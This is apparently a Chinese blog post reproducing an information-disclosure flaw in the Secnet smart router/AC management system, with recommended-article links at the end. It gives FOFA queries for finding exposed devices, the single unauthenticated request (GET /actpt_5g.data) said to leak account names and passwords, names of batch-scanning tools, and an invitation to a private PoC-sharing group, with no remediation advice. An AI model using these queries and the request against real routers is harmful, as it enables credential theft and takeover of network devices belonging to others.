【漏洞复现】Secnet-智能路由系统 actpt_5g.data信息泄露

SuperherRo2024-05-16 11:25

0x01 产品简介

Secnet安网智能AC管理系统是广州安网通信技术有限公司(简称"安网通信")的无线AP管理系统

0x02 漏洞描述

Secnet智能路由系统 acipt 5g.data 接口存在信息泄露漏洞,未经身份验证的远程攻击者可以利用此漏洞获取系统账户名密码等重要凭据,导致系统后台权限丢失。

0x03 搜索语法

bash 复制代码 
fofa:
title="安网-智能路由系统" || title=="智能路由系统" || title="安网科技-智能路由系统" || title="智能AC管理系统"

0x04 漏洞详情

bash 复制代码 
GET /actpt_5g.data

0x05 工具批量

nuclei

afrog

xray

POC获取

请使用VX扫一扫加入内部POC分享圈子

相关推荐
SuperherRo2 个月前
spring综合性利用工具-SpringBootVul-GUI(五)
spring boot·spring·漏洞利用·信息泄露
华为云开发者联盟10 个月前
Prometheus配置Basic Auth进行安全防护,实现登录控制
prometheus·华为云开发者联盟·安全加密·信息泄露
热门推荐
01(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明02PyTorch机器学习实现液态神经网络03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总04玄机平台应急响应—webshell查杀05Coze扣子平台完整体验和实践(附国内和国际版对比)06Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO07【目标跟踪】相机运动补偿08Unity中PICO实现 隔空取物 和 接触抓取物体09RAG 实践- Ollama+RagFlow 部署本地知识库10量化方法怎么选?如何评估量化后的大模型LLM?